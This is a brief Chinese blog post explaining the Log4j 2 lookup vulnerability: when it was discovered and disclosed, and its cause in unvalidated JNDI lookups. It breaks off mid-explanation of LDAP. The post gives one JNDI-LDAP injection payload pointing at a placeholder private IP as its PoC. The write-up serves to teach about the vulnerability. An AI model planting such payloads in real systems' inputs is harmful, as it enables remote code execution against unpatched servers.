log4j漏洞分析及攻击过程
发布时间
阅读量:
阅读量
log4j漏洞最初由阿里安全团队的一名成员于2021年11月24日发现,并随后向Apache组织进行报告。直至12月10日凌晨,该漏洞信息才被正式公开。此漏洞所具备的安全风险等级较高,其严重程度可与阿里此前遭遇的fastjson漏洞相提并论。
漏洞地址:

1.漏洞原理:
Log4j是一款广泛使用的Java日志记录工具,其后续版本Log4j 2中存在一定的安全隐患。该隐患主要源自Log4j 2所提供的lookup功能,这一功能允许开发人员借助特定协议访问环境配置信息。然而,在该功能的实现过程中,未能对输入内容实施严格的验证机制,从而引发了潜在的安全风险。
poc:${jndi:ldap://192.168.1.x:5678/test}
上述内容即为一个简单的log4漏洞利用示例,其中最为关键的是涉及jndi和ldap这两个类名的理解。通过对这两个类名相关功能的掌握,也能够帮助我们进一步巩固对fastjson漏洞原理的认识。
ldap:
ldap本质上是一种轻量级目录访问协议,其作用类似于早期中国黄页的查询方式,可以高效地从数据库中检索
全部评论 (0)
还没有任何评论哟~
